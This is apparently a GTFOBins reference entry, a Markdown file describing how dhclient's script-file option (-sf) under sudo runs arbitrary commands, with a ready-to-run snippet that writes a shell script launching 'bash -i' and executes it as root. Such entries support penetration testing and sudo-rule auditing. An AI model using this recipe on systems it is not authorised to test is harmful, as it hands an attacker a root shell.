GTFOBins.github.io/_gtfobins/dhclient.md
2024-08-20 15:00:01 +02:00

13 lines
330 B
Markdown

---
functions:
sudo:
- description: The below technique utilizies `dhclient`'s script file option (`-sf`) to execute arbitrary commands with `sudo`.
code: |
cat > /tmp/script.sh << EOF
#!/bin/bash
bash -i
EOF
chmod +x /tmp/script.sh
sudo dhclient -sf /tmp/script.sh
---